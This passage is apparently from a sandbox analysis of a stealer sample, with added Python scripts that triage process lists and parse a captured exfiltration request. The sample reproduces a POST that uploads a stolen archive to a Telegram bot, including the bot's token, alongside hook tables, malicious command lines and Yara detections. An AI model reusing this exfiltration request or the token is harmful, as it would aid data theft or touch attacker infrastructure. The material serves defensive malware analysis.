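    headers: Dict[str, str]
    boundary: Optional[str] = None
    field_name: Optional[str] = None        # "file" in session 1, "document" in session 2
    filename: Optional[str] = None
    part_content_type: Optional[str] = None
    payload_type: str = "unknown"
    telegram_bot_id: Optional[str] = None
    telegram_bot_token: Optional[str] = None
    telegram_api_method: Optional[str] = None


def parse_head(head: bytes):
    """Split an HTTP/1.1 request head into (method, path, {lower-cased name: value})."""
    text = head.decode("latin-1")
    request_line, _, rest = text.partition("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in rest.split("\r\n"):
        if not line:                      # blank line terminates the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_payload(data: bytes) -> str:
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return "unknown"


def parse_exfil_request(head: bytes, body_prefix: bytes) -> ExfilIndicators:
    """Parse the request head and the first multipart part; body_prefix may be truncated."""
    method, path, headers = parse_head(head)
    ind = ExfilIndicators(method, path, headers)
    m = TELEGRAM_PATH_RE.match(path)
    if m and headers.get("host") == "api.telegram.org":
        ind.telegram_bot_id, ind.telegram_bot_token, ind.telegram_api_method = m.groups()
    bm = BOUNDARY_RE.search(headers.get("content-type", ""))
    if not bm:
        return ind                        # not multipart; nothing more to pull out
    ind.boundary = bm.group(1)
    delimiter = b"--" + ind.boundary.encode() + b"\r\n"
    if not body_prefix.startswith(delimiter):
        return ind                        # body does not open with the declared boundary
    part_head, sep, payload = body_prefix[len(delimiter):].partition(b"\r\n\r\n")
    if not sep:
        return ind                        # part headers cut off in this chunk
    for line in part_head.decode("latin-1").split("\r\n"):
        name, _, value = line.partition(":")
        lname = name.strip().lower()
        if lname == "content-disposition":
            dm = DISPOSITION_RE.search(value)
            if dm:
                ind.field_name, ind.filename = dm.group(1), dm.group(2)
        elif lname == "content-type":
            ind.part_content_type = value.strip()
    ind.payload_type = classify_payload(payload)
    return ind


# Constructed sample: the request head as shown in the report, plus the first
# bytes of the multipart body decoded from the "Data Raw" hex column.
SAMPLE_HEAD = (
    b"POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1\r\n"
    b"Host: api.telegram.org\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Content-Length: 689033\r\n"
    b"User-Agent: python-urllib3/2.2.1\r\n"
    b"Content-Type: multipart/form-data; boundary=5975628ebf9ab97afcc0f7733f8c581f\r\n"
    b"\r\n"
)
SAMPLE_BODY_START = (
    b"--5975628ebf9ab97afcc0f7733f8c581f\r\n"
    b'Content-Disposition: form-data; name="document"; filename="Prometheus-alfons.rar"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"Rar!\x1a\x07\x01\x00\xdb\xd5\x38\x19\x21\x04\x00\x00"
)


def triage_sample() -> ExfilIndicators:
    return parse_exfil_request(SAMPLE_HEAD, SAMPLE_BODY_START)
```

The parser deliberately tolerates a truncated first chunk (it returns whatever it has rather than raising), because sandbox dumps cut the body at fixed sizes. The bot token is the actionable indicator here: it identifies the attacker's Telegram bot for a takedown report, and a GET to the bot's getMe method tells you whether it is still live, which is an interaction with attacker infrastructure and should be a deliberate decision rather than a reflex.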


Code Manipulations

Function Name                   Hook Type   Active in Processes
ZwEnumerateKey                  INLINE      winlogon.exe, explorer.exe
NtQuerySystemInformation        INLINE      winlogon.exe, explorer.exe
ZwResumeThread                  INLINE      winlogon.exe, explorer.exe
NtDeviceIoControlFile           INLINE      winlogon.exe, explorer.exe
ZwDeviceIoControlFile           INLINE      winlogon.exe, explorer.exe
NtEnumerateKey                  INLINE      winlogon.exe, explorer.exe
NtQueryDirectoryFile            INLINE      winlogon.exe, explorer.exe
ZwEnumerateValueKey             INLINE      winlogon.exe, explorer.exe
ZwQuerySystemInformation        INLINE      winlogon.exe, explorer.exe
NtResumeThread                  INLINE      winlogon.exe, explorer.exe
RtlGetNativeSystemInformation   INLINE      winlogon.exe, explorer.exe
NtQueryDirectoryFileEx          INLINE      winlogon.exe, explorer.exe
NtEnumerateValueKey             INLINE      winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx          INLINE      winlogon.exe, explorer.exe
ZwQueryDirectoryFile            INLINE      winlogon.exe, explorer.exe

Function Name                   Hook Type   New Data
ZwEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation   INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Function Name                   Hook Type   New Data
ZwEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile           INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey                  INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation        INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread                  INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation   INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey             INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx          INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile            INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF


Target ID: 0
Start time: 17:47:04
Start date: 09/05/2024
Path: C:\Users\user\Desktop\DevxExecutor.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\DevxExecutor.exe"
Imagebase: 0x360000
File size: 46'285'824 bytes
MD5 hash: E4897EF7419E128B1F7473119CE0BD07
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 17:47:10
Start date: 09/05/2024
Path: C:\Users\user\AppData\Local\Temp\cstealer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\cstealer.exe"
Imagebase: 0x7ff6957e0000
File size: 8'870'956 bytes
MD5 hash: BC2B7DE582FB94F0C44855D8FAB8C236
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 17:47:11
Start date: 09/05/2024
Path: C:\Users\user\AppData\Local\Temp\cstealer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\cstealer.exe"
Imagebase: 0x7ff6957e0000
File size: 8'870'956 bytes
MD5 hash: BC2B7DE582FB94F0C44855D8FAB8C236
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 17:47:12
Start date: 09/05/2024
Path: C:\Users\user\AppData\Local\Temp\main.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\main.exe"
Imagebase: 0x7ff6d6e90000
File size: 37'726'222 bytes
MD5 hash: 1EE0837EEDF03E82AA652B1BF157387F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 5
Start time: 17:47:13
Start date: 09/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
Imagebase: 0x7ff704450000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 17:47:13
Start date: 09/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 17:47:13
Start date: 09/05/2024
Path: C:\Users\user\AppData\Local\Temp\cstealer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
Imagebase: 0x7ff6957e0000
File size: 8'870'956 bytes
MD5 hash: BC2B7DE582FB94F0C44855D8FAB8C236
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 8
Start time: 17:47:13
Start date: 09/05/2024
Path: C:\Users\user\AppData\Local\Temp\main.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\main.exe"
Imagebase: 0x7ff6d6e90000
File size: 37'726'222 bytes
MD5 hash: 1EE0837EEDF03E82AA652B1BF157387F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                                                                                                          Target ID:9
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2274816378.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2294300603.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2207767340.0000020102CDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2219861394.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:12
                                                                                                                                                          Start time:17:47:14
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                          File size:32'454'900 bytes
                                                                                                                                                          MD5 hash:A1DDA0E77B597A95DC0D894A4D28780A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:14
                                                                                                                                                          Start time:17:47:16
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                                                                                                                                          Imagebase:0x7ff704450000
                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:15
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:16
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                                                                                                                                          Imagebase:0x7ff6957e0000
                                                                                                                                                          File size:8'870'956 bytes
                                                                                                                                                          MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:17
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                                                                          Imagebase:0x7ff61a5b0000
                                                                                                                                                          File size:25'152'315 bytes
                                                                                                                                                          MD5 hash:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 46%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true
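The process entries above carry several indicators that a triage script can pull out of a Joe Sandbox process list without reading it by hand: a PyInstaller-bundled interpreter in %TEMP% being used as a Python runtime (`cstealer.exe -m pip install pycryptodome`), `Build.exe` launched from the `_MEI67202` onefile extraction directory with an inline `-p` argument, executables running from `C:\ProgramData\Microsoft`, and Yara hits whose `Source` field encodes the process and memory region they came from. The following Python is an added example, not part of the Joe Sandbox report or of any Joe Security tooling. It parses a constructed excerpt copied from the entries above, applies four path and command-line heuristics, and decodes only the first and fourth dotted fields of each Yara `Source` identifier as the hexadecimal PID and region base address; the meaning of the remaining fields is not documented on this page and is left alone. Treating `-p<password>` as a self-extracting archive password switch is an assumption (it is the 7-Zip/WinRAR SFX convention), since the page does not identify what `Build.exe` is.

```python
import re

# Constructed excerpt of the process list above: one "Key:value" line per
# attribute, a blank line between processes, Yara lines in the report's own
# "• Rule: ..., Source: ..." shape. Values are copied from the entries above.
SAMPLE_REPORT = r"""
Target ID:9
Start time:17:47:14
Path:C:\Users\user\AppData\Local\Temp\cstealer.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
MD5 hash:BC2B7DE582FB94F0C44855D8FAB8C236
Yara matches:
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:10
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
Has exited:true

Target ID:12
Path:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
Has exited:true

Target ID:17
Path:C:\ProgramData\Microsoft\hacn.exe
Commandline:"C:\ProgramData\Microsoft\hacn.exe"
Has exited:true
"""

YARA_RE = re.compile(r"Rule: (?P<rule>[^,]+), .*?Source: (?P<src>[0-9A-F.]+)\.sdmp")

# (name, regex over "Path Commandline", rationale). Heuristics, not signatures.
INDICATORS = [
    ("pyinstaller-temp", re.compile(r"\\_MEI\d+\\", re.I),
     "PyInstaller onefile extraction directory in the path or command line"),
    ("pip-from-temp", re.compile(r'\\AppData\\Local\\Temp\\[^\s"]+\.exe"? -m pip install', re.I),
     "bundled interpreter in %TEMP% installing packages at runtime"),
    ("sfx-password", re.compile(r'\.exe"? -p\S+', re.I),
     "ASSUMPTION: -p<password> read as a 7-Zip/WinRAR SFX password switch"),
    ("programdata-drop", re.compile(r'C:\\ProgramData\\Microsoft\\[^\\\s"]+\.exe', re.I),
     "executable in a user-writable directory named like a vendor path"),
]


def parse_processes(text):
    """Split the report into one dict per Target ID; Yara hits become (rule, source) pairs."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            cur = {"Target ID": line.split(":", 1)[1], "Yara matches": []}
            procs.append(cur)
        elif cur is None:
            continue
        elif line.startswith("•"):
            m = YARA_RE.search(line)
            if m:
                cur["Yara matches"].append((m.group("rule"), m.group("src")))
        elif ":" in line and line != "Yara matches:":
            key, value = line.split(":", 1)
            cur[key] = value
    return procs


def yara_summary(proc):
    """Distinct rules and distinct (pid, base address) regions behind the hits.
    Field 1 of the dotted Source ID is the PID in hex (it equals the Target ID
    here), field 4 the region base; the other fields are not interpreted."""
    rules = sorted({rule for rule, _ in proc["Yara matches"]})
    regions = set()
    for _, src in proc["Yara matches"]:
        fields = src.split(".")
        regions.add((int(fields[0], 16), int(fields[3], 16)))
    return rules, sorted(regions)


def triage(text):
    """Return {target_id: {flags, rules, regions}} for every process that trips
    at least one heuristic or carries a Yara hit."""
    findings = {}
    for proc in parse_processes(text):
        haystack = proc.get("Path", "") + " " + proc.get("Commandline", "")
        flags = [name for name, rx, _ in INDICATORS if rx.search(haystack)]
        rules, regions = yara_summary(proc)
        if flags or rules:
            findings[proc["Target ID"]] = {"flags": flags, "rules": rules, "regions": len(regions)}
    return findings


if __name__ == "__main__":
    for tid, f in triage(SAMPLE_REPORT).items():
        print(f"Target {tid}: flags={f['flags']} rules={f['rules']} regions={f['regions']}")
```

On the excerpt this flags Target 9 for `pip-from-temp` with two Yara rules across two distinct memory regions, Targets 10 and 12 for `pyinstaller-temp` and `sfx-password`, and Target 17 for `programdata-drop`; the `conhost.exe` and plain `cmd.exe` entries produce nothing, which is the point of keying the heuristics on paths rather than on process names.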

                                                                                                                                                          Target ID:18
                                                                                                                                                          Start time:17:47:17
                                                                                                                                                          Start date:09/05/2024
                                                                                                                                                          Path:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                                                                          Imagebase:0x7ff704090000
                                                                                                                                                          File size:7'242'457 bytes
                                                                                                                                                          MD5 hash:A71FC3CA1BD1AF148EE4C1BFABCBE0DA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000012.00000003.2244326949.00000177139C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000012.00000003.2244326949.00000177139C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 47%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:19
